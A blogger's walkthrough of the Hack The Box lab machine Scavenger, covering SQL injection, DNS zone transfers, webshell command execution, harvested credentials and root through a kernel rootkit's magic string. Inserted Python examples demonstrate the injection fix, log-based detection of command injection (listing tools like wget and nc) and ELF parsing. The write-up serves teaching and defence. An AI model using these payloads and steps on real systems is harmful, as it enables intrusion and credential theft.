Hack The Box Scavenger Writeup – 10.10.10.155

Hello, welcome to my Hack The Box Scavenger writeup. Like my previous HackTheBox Windows walkthroughs, I will try to be as detailed as possible, with explanations where needed. The machine is highly vulnerable to a recent Exim vulnerability via the EHLO strings exploit discovered by QAX-A-Team.

NMAP PORT SCAN

As with other machines, I added the machine IP 10.10.10.155 to /etc/hosts as scavenger.htb and started the nmap port scan. The nmap scan shows the following ports are open:

21/tcp open  ftp
22/tcp open  ssh
43/tcp open  whois
53/tcp open  domain
80/tcp open  http

nmap full result:

⚡ ⚙  root@ns09 ~/htb/scavenger nmap -T4 -A -v -sTV scavenger.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-19 22:35 +03
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 22:35
Completed NSE at 22:35, 0.00s elapsed
Initiating NSE at 22:35
Completed NSE at 22:35, 0.00s elapsed
Initiating NSE at 22:35
Completed NSE at 22:35, 0.00s elapsed
Initiating Ping Scan at 22:35
Scanning scavenger.htb (10.10.10.155) [4 ports]
Completed Ping Scan at 22:35, 0.22s elapsed (1 total hosts)
Initiating Connect Scan at 22:35
Scanning scavenger.htb (10.10.10.155) [1000 ports]
Discovered open port 21/tcp on 10.10.10.155
Discovered open port 80/tcp on 10.10.10.155
Discovered open port 22/tcp on 10.10.10.155
Discovered open port 53/tcp on 10.10.10.155
Discovered open port 25/tcp on 10.10.10.155
Discovered open port 43/tcp on 10.10.10.155
Nmap scan report for scavenger.htb (10.10.10.155)
Host is up (0.17s latency).
Not shown: 638 filtered ports, 356 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u4 (protocol 2.0)
| ssh-hostkey: 
|   2048 df:94:47:03:09:ed:8c:f7:b6:91:c5:08:b5:20:e5:bc (RSA)
|   256 e3:05:c1:c5:d1:9c:3f:91:0f:c0:35:4b:44:7f:21:9e (ECDSA)
|_  256 45:92:c0:a1:d9:5d:20:d6:eb:49:db:12:a5:70:b7:31 (ED25519)
25/tcp open  smtp    Exim smtpd 4.89
| smtp-commands: ib01.supersechosting.htb Hello scavenger.htb [10.10.14.11], SIZE 52428800, 8BITMIME, PIPELINING, PRDR, HELP, 
|_ Commands supported: AUTH HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP 
43/tcp open  whois?
| fingerprint-strings: 
|   GenericLines, GetRequest, HTTPOptions, Help, RTSPRequest: 
|     % SUPERSECHOSTING WHOIS server v0.6beta@MariaDB10.1.37
|     more information on SUPERSECHOSTING, visit http://www.supersechosting.htb
|     This query returned 0 object
|   SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
|     % SUPERSECHOSTING WHOIS server v0.6beta@MariaDB10.1.37
|     more information on SUPERSECHOSTING, visit http://www.supersechosting.htb
|_    1267 (HY000): Illegal mix of collations (utf8mb4_general_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation 'like'
53/tcp open  domain  ISC BIND 9.10.3-P4 (Debian Linux)
| dns-nsid: 
|_  bind.version: 9.10.3-P4-Debian
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port43-TCP:V=7.80%I=7%D=12/19%Time=5DFBD293%P=x86_64-pc-linux-gnu%r(Gen

//----SNIP----//

Uptime guess: 0.022 days (since Thu Dec 19 22:12:45 2019)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=256 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: ib01.supersechosting.htb; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using proto 1/icmp)
HOP RTT       ADDRESS
1   162.02 ms 10.10.14.1
2   162.30 ms scavenger.htb (10.10.10.155)

NSE: Script Post-scanning.
Initiating NSE at 22:44
Completed NSE at 22:44, 0.00s elapsed
Initiating NSE at 22:44
Completed NSE at 22:44, 0.00s elapsed
Initiating NSE at 22:44
Completed NSE at 22:44, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 512.59 seconds
           Raw packets sent: 182 (14.232KB) | Rcvd: 88 (8.509KB)
 ⚡ ⚙ root@ns09~/htb/scavenger 

Nmap also shows a number of services running, including Exim smtpd version 4.89 on port 25 and a possible MX host, ib01.supersechosting.htb.

ENUMERATION

Let us first look at the webserver on the port 80.

So, there is nothing. I noticed the domain www.supersechosting.htb in my nmap scan, so I added this domain to my /etc/hosts against the IP of the machine and browsed the website. Here is the result:

There is nothing there either, but what caught my attention is the website’s list of private DNS & WHOIS servers. The list says the DNS server is dns.supersechosting.htb and the WHOIS server is at whois.supersechosting.htb. I added both to my /etc/hosts for enumeration. After reading the nmap results again, I noticed the WHOIS server is running on MariaDB 10.1.37. Let's

Using SQL injection against the MariaDB-backed WHOIS service, I found 4 potential vHosts:

') UNION (SELECT (SELECT GROUP_CONCAT(id, domain SEPARATOR " / ") FROM  whois.customers), '2')#
> supersechosting.htb 
> justanotherblog.htb 
> pwnhats.htb
> rentahacker.htb
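As an added illustration (not code from the original post, nor from the box itself), the snippet below shows why the WHOIS lookup above could be abused. It builds the same kind of LIKE query two ways, once by splicing the search term into the SQL text and once with a bound parameter, and runs the page's UNION payload against both. SQLite stands in for MariaDB so it runs offline, which is why the payload is rewritten with group_concat(X, sep) and a "--" comment; the table name, column names and the exact shape of the original query are assumptions.

```python
import sqlite3

# Constructed stand-in for the whois.customers table; SQLite replaces MariaDB
# so this runs offline. Table and column names are assumptions.
CUSTOMERS = [
    (1, "supersechosting.htb"),
    (2, "justanotherblog.htb"),
    (3, "pwnhats.htb"),
    (4, "rentahacker.htb"),
]

# The page's payload, rewritten for SQLite: group_concat(X, sep) instead of
# MySQL's GROUP_CONCAT(... SEPARATOR ...) and "--" instead of "#" as the comment.
INJECTION_PAYLOAD = (
    "') UNION SELECT (SELECT group_concat(id || ' ' || domain, ' / ') "
    "FROM customers), '2' --"
)


def build_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE customers (id INTEGER PRIMARY KEY, domain TEXT)")
    db.executemany("INSERT INTO customers (id, domain) VALUES (?, ?)", CUSTOMERS)
    return db


def lookup_vulnerable(db, term):
    """Assumed shape of the original lookup: the search term is pasted into the SQL."""
    sql = f"SELECT domain, id FROM customers WHERE domain LIKE ('%{term}%')"
    return db.execute(sql).fetchall()


def lookup_parameterized(db, term):
    """Same lookup with a bound parameter: the term can only ever be a LIKE pattern."""
    sql = "SELECT domain, id FROM customers WHERE domain LIKE ?"
    return db.execute(sql, (f"%{term}%",)).fetchall()


def leaked_rows(rows):
    """Rows whose first column is not a plain domain: evidence the UNION fired."""
    return [r for r in rows if " / " in str(r[0])]


if __name__ == "__main__":
    db = build_db()
    print("vulnerable:   ", leaked_rows(lookup_vulnerable(db, INJECTION_PAYLOAD)))
    print("parameterized:", lookup_parameterized(db, INJECTION_PAYLOAD))
```

With the spliced query the payload closes the LIKE pattern and appends a UNION that returns every id and domain in one row; with the bound parameter the whole payload is just a pattern that matches no domain and the query returns nothing. The collation error in the nmap output is the same LIKE clause choking on an unexpected input, which is what first hinted at the injection.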

I ran dig AXFR (a zone transfer request) against each of the above vHosts to enumerate further, and I actually found a handful of bounty:

 ⚡ ⚙  root@ns09~/htb/scavenger for x in 'supersechosting.htb' 'pwnhats.htb' 'rentahacker.htb' 'justanotherblog.htb'; do dig AXFR $x @10.10.10.155; done

; <<>> DiG 9.11.5-P4-5.1+b1-Debian <<>> AXFR supersechosting.htb @10.10.10.155
;; global options: +cmd
supersechosting.htb.	604800	IN	SOA	ns1.supersechosting.htb. root.supersechosting.htb. 3 604800 86400 2419200 604800
supersechosting.htb.	604800	IN	NS	ns1.supersechosting.htb.
supersechosting.htb.	604800	IN	MX	10 mail1.supersechosting.htb.
supersechosting.htb.	604800	IN	A	10.10.10.155
ftp.supersechosting.htb. 604800	IN	A	10.10.10.155
mail1.supersechosting.htb. 604800 IN	A	10.10.10.155
ns1.supersechosting.htb. 604800	IN	A	10.10.10.155
whois.supersechosting.htb. 604800 IN	A	10.10.10.155
www.supersechosting.htb. 604800	IN	A	10.10.10.155
supersechosting.htb.	604800	IN	SOA	ns1.supersechosting.htb. root.supersechosting.htb. 3 604800 86400 2419200 604800
;; Query time: 149 msec
;; SERVER: 10.10.10.155#53(10.10.10.155)
;; WHEN: Fri Dec 20 22:42:34 +03 2019
;; XFR size: 10 records (messages 1, bytes 275)

; <<>> DiG 9.11.5-P4-5.1+b1-Debian <<>> AXFR pwnhats.htb @10.10.10.155
;; global options: +cmd
pwnhats.htb.		604800	IN	SOA	ns1.supersechosting.htb. root.supersechosting.htb. 5 604800 86400 2419200 604800
pwnhats.htb.		604800	IN	NS	ns1.supersechosting.htb.
pwnhats.htb.		604800	IN	MX	10 mail1.pwnhats.htb.
pwnhats.htb.		604800	IN	A	10.10.10.155
mail1.pwnhats.htb.	604800	IN	A	10.10.10.155
www.pwnhats.htb.	604800	IN	A	10.10.10.155
pwnhats.htb.		604800	IN	SOA	ns1.supersechosting.htb. root.supersechosting.htb. 5 604800 86400 2419200 604800
;; Query time: 150 msec
;; SERVER: 10.10.10.155#53(10.10.10.155)
;; WHEN: Fri Dec 20 22:42:34 +03 2019
;; XFR size: 7 records (messages 1, bytes 225)

; <<>> DiG 9.11.5-P4-5.1+b1-Debian <<>> AXFR rentahacker.htb @10.10.10.155
;; global options: +cmd
rentahacker.htb.	604800	IN	SOA	ns1.supersechosting.htb. root.supersechosting.htb. 4 604800 86400 2419200 604800
rentahacker.htb.	604800	IN	NS	ns1.supersechosting.htb.
rentahacker.htb.	604800	IN	MX	10 mail1.rentahacker.htb.
rentahacker.htb.	604800	IN	A	10.10.10.155
mail1.rentahacker.htb.	604800	IN	A	10.10.10.155
sec03.rentahacker.htb.	604800	IN	A	10.10.10.155
www.rentahacker.htb.	604800	IN	A	10.10.10.155
rentahacker.htb.	604800	IN	SOA	ns1.supersechosting.htb. root.supersechosting.htb. 4 604800 86400 2419200 604800
;; Query time: 150 msec
;; SERVER: 10.10.10.155#53(10.10.10.155)
;; WHEN: Fri Dec 20 22:42:34 +03 2019
;; XFR size: 8 records (messages 1, bytes 251)

; <<>> DiG 9.11.5-P4-5.1+b1-Debian <<>> AXFR justanotherblog.htb @10.10.10.155
;; global options: +cmd
justanotherblog.htb.	604800	IN	SOA	ns1.supersechosting.htb. root.supersechosting.htb. 5 604800 86400 2419200 604800
justanotherblog.htb.	604800	IN	NS	ns1.supersechosting.htb.
justanotherblog.htb.	604800	IN	MX	10 mail1.justanotherblog.htb.
justanotherblog.htb.	604800	IN	A	10.10.10.155
mail1.justanotherblog.htb. 604800 IN	A	10.10.10.155
www.justanotherblog.htb. 604800	IN	A	10.10.10.155
justanotherblog.htb.	604800	IN	SOA	ns1.supersechosting.htb. root.supersechosting.htb. 5 604800 86400 2419200 604800
;; Query time: 156 msec
;; SERVER: 10.10.10.155#53(10.10.10.155)
;; WHEN: Fri Dec 20 22:42:35 +03 2019
;; XFR size: 7 records (messages 1, bytes 233)

 ⚡ ⚙  root@ns09~/htb/scavenger

I again updated my /etc/hosts with the new vhosts I found, then browsed each one manually. On the host sec03.rentahacker.htb I found a note: “Owned by 31173 HAXXOR team!!!”.

Now I know there is something hidden in the domain sec03.rentahacker.htb, so my next step was to run GoBuster against it.

GoBuster would take a lot of time because I used the wrong wordlist, so after getting enough status 200 results I paused the scan. I used the command below, “gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://sec03.rentahacker.htb -x php”, to scan for the php extension.

The /shell.php seemed interesting, so the next step was to use WFuzz with this command:

wfuzz -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt --hl 0 --hc 404,400 http://sec03.rentahacker.htb/shell.php?FUZZ

wfuzz found a parameter named “hidden”, and I could execute commands through the hidden parameter successfully.
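From the defender's side, the technique above leaves a very recognisable trail in the web server's access log: a burst of requests to one script with many different parameter names (the wfuzz run), followed by requests whose parameter value is a shell command. The script below is an added example, not code from the original post; it parses Apache combined-format log lines (a constructed sample is embedded) and flags both patterns. The indicator list and the fuzzing threshold are assumptions to tune for a real deployment.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Apache combined-log prefix: client, ident, user, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Shell-command indicators in a decoded parameter value: a common binary name
# standing on its own, a sensitive path, or command substitution (assumed list).
CMD_INDICATORS = re.compile(
    r'(?:^|[;|&\s])(?:whoami|id|uname|cat|ls|wget|curl|nc|bash|sh|python3?)(?:\s|$)'
    r'|/etc/passwd|\$\(|`')


def parse_line(line):
    """Return (ip, path, [(param, value), ...], status), or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    params = parse_qsl(url.query, keep_blank_values=True)  # percent-decodes values
    return m.group("ip"), url.path, params, int(m.group("status"))


def find_command_injection(lines):
    """Requests whose parameter value looks like a shell command."""
    hits = []
    for line in lines:
        parsed = parse_line(line)
        if not parsed:
            continue
        ip, path, params, _status = parsed
        for name, value in params:
            if CMD_INDICATORS.search(value):
                hits.append((ip, path, name, value))
    return hits


def find_param_fuzzing(lines, threshold=10):
    """(ip, path, distinct parameter names) where one client tried many names
    against the same script, the signature of a parameter brute-force."""
    names = defaultdict(set)
    for line in lines:
        parsed = parse_line(line)
        if not parsed:
            continue
        ip, path, params, _status = parsed
        for name, _value in params:
            names[(ip, path)].add(name)
    return sorted((ip, path, len(n)) for (ip, path), n in names.items()
                  if len(n) >= threshold)


# Constructed sample log: normal browsing, a parameter brute-force against
# /shell.php, then two command executions through the "hidden" parameter.
_TS = "20/Dec/2019:22:50:01 +0300"


def _entry(ip, method, target, status, size):
    return f'{ip} - - [{_TS}] "{method} {target} HTTP/1.1" {status} {size} "-" "Mozilla/5.0"'


SAMPLE_LOG = [
    _entry("10.10.14.5", "GET", "/index.html", 200, 512),
    _entry("10.10.14.5", "GET", "/search.php?q=hats", 200, 2048),
    _entry("10.10.14.5", "POST", "/login.php", 302, 0),
] + [
    _entry("10.10.14.11", "GET", f"/shell.php?{name}=1", 200, 0)
    for name in ["id", "user", "page", "file", "cmd", "debug",
                 "q", "token", "lang", "view", "path", "hidden"]
] + [
    _entry("10.10.14.11", "GET", "/shell.php?hidden=whoami", 200, 8),
    _entry("10.10.14.11", "GET", "/shell.php?hidden=cat%20config/config_inc.php", 200, 301),
]

if __name__ == "__main__":
    for hit in find_param_fuzzing(SAMPLE_LOG):
        print("parameter fuzzing:", hit)
    for hit in find_command_injection(SAMPLE_LOG):
        print("command in parameter:", hit)
```

The two checks are deliberately independent: the fuzzing detector fires before any command is run, on nothing but the number of distinct parameter names one client throws at one script, while the injection detector catches the later requests even from a client that never fuzzed. Both only read the access log, which is exactly the file the support team on this box said they had backed up.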

Command:

A HTB forum user suggested a WebShell that was supposed to work for getting a reverse shell. I had to modify it a bit to make it work.

Using my script I got the shell and found the credentials for the user “ib01c03”:

 ⚡ ⚙  root@ns09~/htb/scavenger python3 nav1n.py -t http://sec03.rentahacker.htb/shell.php\?hidden\=
shell> whoami
ib01c03
shell> id
uid=1003(ib01c03) gid=1004(customers) groups=1004(customers)
shell> cat config/config_inc.php
<?php
$g_hostname               = 'localhost';
$g_db_type                = 'mysqli';
$g_database_name          = 'ib01c03';
$g_db_username            = 'ib01c03';
$g_db_password            = 'Thi$sh1tIsN0tGut';
$g_default_timezone       = 'Europe/Berlin';
$g_crypto_master_salt     = 'DCD4OIydnPefp27q8Bu5TJHE2RfyO4Zit13B6zLfJdQ=';
shell> 

I initially thought the password was for SSHing to sec03.rentahacker.htb, but it didn’t work; then I tried it against different hosts, and none worked. Lastly, I tried the password for FTP and logged in immediately.

 ⚡  root@ns09~/htb/scavenger ftp sec03.rentahacker.htb
Connected to scavenger.htb.
220 (vsFTPd 3.0.3)
Name (sec03.rentahacker.htb:root): ib01c03
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 1003     1004     16689687 Oct 17  2018 bugtracker.2.18.tgz
drwxr-xr-x   15 1003     1004        12288 Dec 10  2018 sec03
-rw-r--r--    1 1003     1004     10503584 Dec 06  2018 wordpress.tgz
drwxr-xr-x    5 1003     1004         4096 Dec 10  2018 www
226 Directory send OK.
ftp> 

Sad face again: there is not much info to go further. After painstaking enumeration for more than 45 minutes, I decided to ditch the FTP and get back to the shell I got earlier. I think the FTP is one of the many rabbit holes in this box.

Before heading back to the shell, I decided to get some hints from the forum. One of the users told me there are “mails” in the “ib01c03” mail directory which may help me go further, and that I can only see them by “reading more”. I fired up my terminal and the shell.

First I need to find the users with a mailbox, and the mailbox location. I used the ls -l /var/spool/mail/ command to list the mailboxes. I know that the mail spool is always a part of the user’s home directory; however, sometimes it can also be shared or located outside it.

Using the list command I found 2 mailboxes, one for the user “ib01c03” and another for “support”. I will enumerate them one by one to see if I can find credentials or something like an SSH key to log in to the box.

 ⚡ ⚙  root@ns09 ~/htb/scavenger python3 nav1n.py -t http://sec03.rentahacker.htb/shell.php\?hidden\=
shell> ls -l /var/spool/mail/
total 8
-rw-rw-r-- 1 root mail 1274 Dec 10  2018 ib01c03
-rw-rw---- 1 root mail 1043 Dec 11  2018 support

shell> ls -l /var/spool/mail/support
-rw-rw---- 1 root mail 1043 Dec 11  2018 /var/spool/mail/support

shell> ls -l /var/spool/mail/ib01c03
-rw-rw-r-- 1 root mail 1274 Dec 10  2018 /var/spool/mail/ib01c03

shell> 

The support mailbox seemed empty, so I listed the messages of my user ib01c03. He has 1 message, which actually contained a credential for the FTP account of another user called “ib01ftp”.

 ⚡ ⚙  root@ns09~/htb/scavenger python3 nav1n.py -t http://sec03.rentahacker.htb/shell.php\?hidden\=
shell> cat /var/mail/support
shell> cat message /var/mail/support
shell> cat message /var/mail/ib01c03
From support@ib01.supersechosting.htb Mon Dec 10 21:10:56 2018
Return-path: <support@ib01.supersechosting.htb>
Envelope-to: ib01c03@ib01.supersechosting.htb
Delivery-date: Mon, 10 Dec 2018 21:10:56 +0100
Received: from support by ib01.supersechosting.htb with local (Exim 4.89)
	(envelope-from <support@ib01.supersechosting.htb>)
	id 1gWRtI-0000ZK-8Q
	for ib01c03@ib01.supersechosting.htb; Mon, 10 Dec 2018 21:10:56 +0100
To: <ib01c03@ib01.supersechosting.htb>
Subject: Re: Please help! Site Defaced!
In-Reply-To: Your message of Mon, 10 Dec 2018 21:04:49 +0100
	<E1gWRnN-0000XA-44@ib01.supersechosting.htb>
References: <E1gWRnN-0000XA-44@ib01.supersechosting.htb>
X-Mailer: mail (GNU Mailutils 3.1.1)
Message-Id: <E1gWRtI-0000ZK-8Q@ib01.supersechosting.htb>
From: support <support@ib01.supersechosting.htb>
Date: Mon, 10 Dec 2018 21:10:56 +0100
X-IMAPbase: 1544472964 2
Status: O
X-UID: 1
>> Please we need your help. Our site has been defaced!
>> What we should do now?
>>
>> rentahacker.htb

Hi, we will check when possible. We are working on another incident right now. We just make a backup of the apache logs.
Please check if there is any strange file in your web root and upload it to the ftp server:
ftp.supersechosting.htb
user: ib01ftp
pass: YhgRt56_Ta

Thanks.
shell> 

The content of the message is actually a reply from support to an SOS message, with the subject “Re: Please help! Site Defaced!”. The actual message reads:

Hi, we will check when possible. We are working on another incident right now. We just make a backup of the apache logs.
Please check if there is any strange file in your web root and upload it to the ftp server:
ftp.supersechosting.htb
user: ib01ftp
pass: YhgRt56_Ta
Thanks.

I now have the credentials for FTP on ftp.supersechosting.htb, so let us connect to the FTP server and see what it has in the basket for me.

GETTING USER.TXT

I successfully connected to the FTP using the above credentials. The FTP root directory has a folder called “incidents” which contains two subdirectories, ib01c01 and ib01c03. I assumed these were user directories. The directory ib01c01 contains some files, while ib01c03 is empty.

 ⚡  root@ns09~/htb/scavenger ftp ftp.supersechosting.htb
Connected to scavenger.htb.
220 (vsFTPd 3.0.3)
Name (ftp.supersechosting.htb:root): ib01ftp
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> 
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
dr-xrwx---    4 1005     1000         4096 Dec 10  2018 incidents
226 Directory send OK.
ftp> cd incidents
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
dr-xrwx---    2 1005     1000         4096 Jan 30  2019 ib01c01
dr-xrwx---    2 1005     1000         4096 Dec 10  2018 ib01c03
226 Directory send OK.
ftp> cd ib01c01
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-r--rw-r--    1 1005     1000        10427 Dec 10  2018 ib01c01.access.log
-rw-r--r--    1 1000     1000       835084 Dec 10  2018 ib01c01_incident.pcap
-r--rw-r--    1 1005     1000          173 Dec 11  2018 notes.txt
226 Directory send OK.
ftp> cd ..
250 Directory successfully changed.
ftp> cd ib01c03
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> 

I started to analyze the files. The first file “ib01c01.access.log” :

The second file: “ib01c01_incident.pcap” :

The log file and the notes.txt file didn’t contain much information, so let's concentrate on analyzing the packet capture file. The POST requests in a PCAP file normally give a lot of information. After a while, I found the admin credentials in the packet capture. Password: GetYouAH4t!

The credential didn't work for SSH, but worked for FTP. We earlier found passwords for the users ib01c03 and ib01ftp, so the only user left without a password is ib01c01. I used this password against the user ib01c01 and found user.txt on the FTP.

Privilege Escalation: GETTING ROOT.TXT

The HTB Forum is actually a goldmine. You will get a lot of useful hints. The below thread helped me to get the root without pain.

I started to analyze the PCAP file again; as per the forum, this file is the key to root. After a while, I found that the PCAP also captured an incident that involved a transfer of a file named root.c.

After doing recon for a little while, I found the C source code for the root.c file I mentioned above.

As per this article (https://0x00sec.org/t/kernel-rootkits-getting-your-hands-dirty/1485), when a process writes a magic string to our special device, our LKM will give root credentials to that process. The magic string is “g0tR0ot”, and as per the C source the two devices already in use are –

In the next step, I used the stat command to gather some information about the devices ttyR0 and ttyR.

Now I’m back to the forum with questions in my mind, and I got the exact answer I was looking for. The magic string “g0tR0ot” will only work for the user “ib01c03”; I will not get root privileges with it.

HIDDEN DIRECTORY

The FTP has hidden directories; this information came from the forum. When I ran ls -al, the list command showed them all. After going all the way down I found a file called “root.ko” – a vulnerable rootkit which holds the last key to root.

Ref:

https://github.com/leixiangwu/CSE509-Rootkit/blob/master/README.md

https://oscarlab.github.io/project_files/protego-slides.pdf

Without wasting a moment, I downloaded the file. After analyzing it for a while, I knew that I was looking at an ELF file. ELF files mostly contain useful information in their header. Let us look into it (Ref: https://greek0.net/elf.html).

The header info:

The Head Command

The head command in Linux prints the first lines of a file, so here is the output:

I now have the credential that is supposed to work in the shell to get root. The credential is: g3tPr1v
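To make the ELF header discussion concrete, here is an added example (not code from the original post) that decodes the 64-byte ELF64 header with Python's struct module, checks the properties a loadable kernel module should have, and pulls printable strings out of the rest of the file, which is what head showed the author. The input is a constructed byte blob shaped like a module (ELF64, little-endian, x86-64, ET_REL), not the real root.ko; field offsets and the type/machine constants follow the ELF specification.

```python
import struct

ELF_MAGIC = b"\x7fELF"
E_TYPE = {0: "ET_NONE", 1: "ET_REL", 2: "ET_EXEC", 3: "ET_DYN", 4: "ET_CORE"}
E_MACHINE = {3: "EM_386", 40: "EM_ARM", 62: "EM_X86_64", 183: "EM_AARCH64"}
# ELF64 fields after the 16-byte e_ident: e_type, e_machine, e_version, e_entry,
# e_phoff, e_shoff, e_flags, e_ehsize, e_phentsize, e_phnum, e_shentsize,
# e_shnum, e_shstrndx (48 bytes, so the whole header is 64 bytes).
EHDR64_FMT = "HHIQQQIHHHHHH"
EHDR64_NAMES = ("e_type", "e_machine", "e_version", "e_entry", "e_phoff",
                "e_shoff", "e_flags", "e_ehsize", "e_phentsize", "e_phnum",
                "e_shentsize", "e_shnum", "e_shstrndx")


def parse_elf64_header(data):
    """Decode the ELF64 header; raises ValueError for anything that is not ELF64."""
    if data[:4] != ELF_MAGIC:
        raise ValueError("not an ELF file")
    if data[4] != 2:                       # EI_CLASS: 1 = 32-bit, 2 = 64-bit
        raise ValueError("only ELF64 is handled here")
    endian = "<" if data[5] == 1 else ">"  # EI_DATA: 1 = little, 2 = big endian
    hdr = dict(zip(EHDR64_NAMES, struct.unpack(endian + EHDR64_FMT, data[16:64])))
    hdr["type_name"] = E_TYPE.get(hdr["e_type"], f"unknown({hdr['e_type']})")
    hdr["machine_name"] = E_MACHINE.get(hdr["e_machine"], f"unknown({hdr['e_machine']})")
    hdr["little_endian"] = endian == "<"
    return hdr


def looks_like_kernel_module(hdr, data):
    """Loadable modules are relocatable objects (ET_REL) with no entry point and
    carry a .modinfo section; the section name is found by a plain substring
    search here rather than by walking the section header table."""
    return hdr["e_type"] == 1 and hdr["e_entry"] == 0 and b".modinfo" in data


def printable_strings(data, min_len=4):
    """Runs of printable ASCII at least min_len long, like the strings(1) tool."""
    out, run = [], bytearray()
    for b in data:
        if 0x20 <= b < 0x7F:
            run.append(b)
        else:
            if len(run) >= min_len:
                out.append(run.decode("ascii"))
            run = bytearray()
    if len(run) >= min_len:
        out.append(run.decode("ascii"))
    return out


# Constructed sample: an ELF64 little-endian x86-64 relocatable header followed
# by a fake payload with a .modinfo-style string table. Not the real root.ko.
_e_ident = ELF_MAGIC + bytes([2, 1, 1, 0]) + bytes(8)   # class, data, version, OS ABI, pad
SAMPLE_MODULE = (
    _e_ident
    + struct.pack("<" + EHDR64_FMT, 1, 62, 1, 0, 0, 0x200, 0, 64, 0, 0, 64, 12, 11)
    + b"\x00" * 32
    + b".modinfo\x00license=GPL\x00description=example module\x00"
    + b"\x00" * 16
)

if __name__ == "__main__":
    h = parse_elf64_header(SAMPLE_MODULE)
    print(h["type_name"], h["machine_name"], "module:", looks_like_kernel_module(h, SAMPLE_MODULE))
    print(printable_strings(SAMPLE_MODULE))
```

The header alone tells a responder what kind of object they are holding: an ET_REL file with no program headers and no entry point is a relocatable object, and on a Linux host with a .modinfo section that means a kernel module, so an unknown one found in an FTP tree or a customer home directory deserves the same scrutiny as the device nodes it creates.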

Root.txt

 ⚡  root@ns09 ~/htb/scavenger python3 nav1n.py -t http://sec03.rentahacker.htb/shell.php\?hidden\=
shell> echo "g0tR0ot" > /dev/ttyR0; whoami
ib01c03
shell> echo "g0tR0ot" > /dev/ttyR; whoami
ib01c03
shell> echo "g3tPr1v" > /dev/ttyR0; whoami
root
shell> echo "g3tPr1v" > /dev/ttyR0; cd /root/; ls -la
total 84
drwx------  6 root root  4096 Aug 23 11:51 .
drwxr-xr-x 22 root root  4096 Dec  4  2018 ..
----------  1 root root  5706 Jul 22 18:42 .bash_history
-rw-r--r--  1 root root  3526 Jan 30  2019 .bashrc
drwx------  3 root root  4096 Dec  4  2018 .cache
-rw-------  1 root root   506 Dec  5  2018 .mysql_history
drwxr-xr-x  2 root root  4096 Dec  4  2018 .nano
-rw-r--r--  1 root root   148 Aug 17  2015 .profile
-rw-------  1 root root    27 Dec  4  2018 .python_history
-rw-r--r--  1 root root    74 Dec  9  2018 .selected_editor
drwx------  2 root root  4096 Dec  7  2018 .ssh
-rw-------  1 root root 20110 Jul 22 18:35 .viminfo
-rw-r--r--  1 root root   288 Dec 10  2018 .wget-hsts
drwxr-x---  2 root root  4096 Feb  2  2019 bin
-rw-r--r--  1 root root    90 Jan 30  2019 credits.txt
-rw-------  1 root root    33 Dec  9  2018 root.txt

shell> echo "g3tPr1v" > /dev/ttyR0; cd /root/; cat /root/root.txt
4a08d81[------]9a732b17

shell> 

That’s it, thank you for reading.

Navin

Hey there, I'm Navin, a passionate Info-Sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug-bounty. If you are an HTB user and like my articles, please respect here: Profile: https://www.hackthebox.eu/nav1n
